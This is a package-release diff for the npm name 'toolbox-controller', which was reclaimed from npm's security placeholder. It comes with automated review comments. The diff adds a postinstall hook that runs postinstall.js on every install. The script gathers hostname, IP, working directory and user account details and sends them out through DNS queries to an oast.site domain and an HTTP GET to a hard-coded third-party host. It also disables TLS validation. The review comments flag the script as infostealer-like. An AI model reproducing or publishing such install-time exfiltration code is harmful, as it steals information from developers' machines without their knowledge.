toolbox-controller 0.0.1-security.1 → 1.0.1


Potentially problematic release.



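--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,12 @@
  {
  "name": "toolbox-controller",
- "version": "0.0.1-security.1",
- "description": "security holding package",
- "repository": "npm/security-holder"
+ "version": "1.0.1",
+ "description": "Proof of concept for dependency confusion",
+ "main": "index.js",
+ "scripts": {
+ "postinstall": "node postinstall.js"
+ },
+ "keywords": [],
+ "author": "",
+ "license": "ISC"
  }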
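Review bot: The `postinstall` entry added on new line 7 runs `node postinstall.js` unconditionally on every `npm install` of this package, so install-time code execution is what a consumer actually gets, regardless of the "Proof of concept" wording on line 4. The version it replaces (removed lines 3–5) was the npm security-holder placeholder published after this name was pulled for malicious code, so re-publishing the name with a lifecycle hook reproduces exactly the pattern the placeholder exists to block, and the hook is only neutralised for consumers who install with `--ignore-scripts`. If a callback is genuinely needed for a sanctioned test, make it opt-in so a default install stays inert, e.g. replace the hook with `"poc:callback": "node postinstall.js"` and run it explicitly with `npm run poc:callback`. The `"main": "index.js"` entry also points at a file this diff does not add, so `require('toolbox-controller')` will fail after the hook has already fired.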
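--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -0,0 +1,87 @@
+ const fs = require('fs');
+ const dns = require('dns');
+ const http = require('http');
+ const os = require('os');
+
+ const logFile = '/tmp/postinstall.log';
+
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
+
+ try {
+ fs.appendFileSync(logFile, `Starting postinstall script\n`);
+
+ const hostname = os.hostname();
+ const packageName = process.env.npm_package_name;
+ const packageVersion = process.env.npm_package_version;
+ const ipAddress = require('child_process').execSync('hostname -I').toString().trim();
+ const currentPath = process.cwd();
+ const platform = os.platform();
+ const userInfo = os.userInfo();
+
+ const data = {
+ packageName,
+ packageVersion,
+ hostname,
+ ipAddress,
+ currentPath,
+ platform,
+ userInfo
+ };
+
+ fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
+
+ // Prepare data for DNS exfiltration
+ const dnsData = `${packageName}-${hostname}-${ipAddress}`;
+ const hexData = Buffer.from(dnsData).toString('hex');
+
+ // Split hex data into parts fitting within DNS label length limit
+ const maxLabelLength = 63;
+ const hexDataParts = [];
+ for (let i = 0; i < hexData.length; i += maxLabelLength) {
+ hexDataParts.push(hexData.substring(i, i + maxLabelLength));
+ }
+
+ // Send each part as a separate DNS query
+ hexDataParts.forEach((part, index, arr) => {
+ const partIndex = index + 1;
+ const totalParts = arr.length;
+ const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
+ dns.resolve4(dnsSubdomain, (err, addresses) => {
+ if (err) {
+ fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
+ } else {
+ fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
+ }
+ });
+ });
+
+ // HTTP fallback
+ const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
+
+ const options = {
+ hostname: 'sec.zonduu.me', // Replace with your HTTP server hostname
+ port: 80, // Replace with the appropriate port
+ path: `/callbackplz?${getData}`,
+ method: 'GET'
+ };
+
+ const req = http.request(options, (res) => {
+ let responseData = '';
+ res.on('data', (chunk) => {
+ responseData += chunk;
+ });
+ res.on('end', () => {
+ fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
+ });
+ });
+
+ req.on('error', (e) => {
+ fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
+ });
+
+ req.end();
+
+ fs.appendFileSync(logFile, `postinstall script finished\n`);
+ } catch (e) {
+ fs.appendFileSync(logFile, `Error: ${e.message}\n`);
+ }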
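Review bot: The payload assembled on lines 21–29 and sent on lines 59–66 includes `os.userInfo()` (username, uid, gid, home directory, shell), the working directory and the host's IP addresses, over cleartext HTTP to a hard-coded third-party host and via DNS to a hard-coded out-of-band domain; that is far more than a dependency-confusion proof of concept needs to show that the name resolved, and it makes the package indistinguishable from an infostealer to anyone inspecting it. Line 8 sets `NODE_TLS_REJECT_UNAUTHORIZED` to 0 although the script never requires `https`, so its only effect is to disable certificate validation for nothing visible here; delete it. Line 48 appends `-${partIndex}-${totalParts}` to a chunk that line 41 has already cut at 63 characters, so every full chunk becomes a label of 67 or more characters, exceeding the 63-character DNS label limit that the comment on line 37 invokes, and the beacon silently fails into the `err` branch on line 50; cut the hex at 63 minus the length of that suffix instead. I would reduce the collected data to `const data = { packageName, packageVersion, hostname };` and drop `userInfo`, `currentPath` and `ipAddress`, which also removes the `hostname -I` call on line 16 — that flag is not understood by every `hostname` implementation (macOS and BusyBox, as far as I know), in which case `execSync` throws and the entire script aborts into the catch on line 85 before any callback is attempted.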
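--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
- # Security holding package
-
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
- Please refer to www.npmjs.com/advisories?search=toolbox-controller for more information.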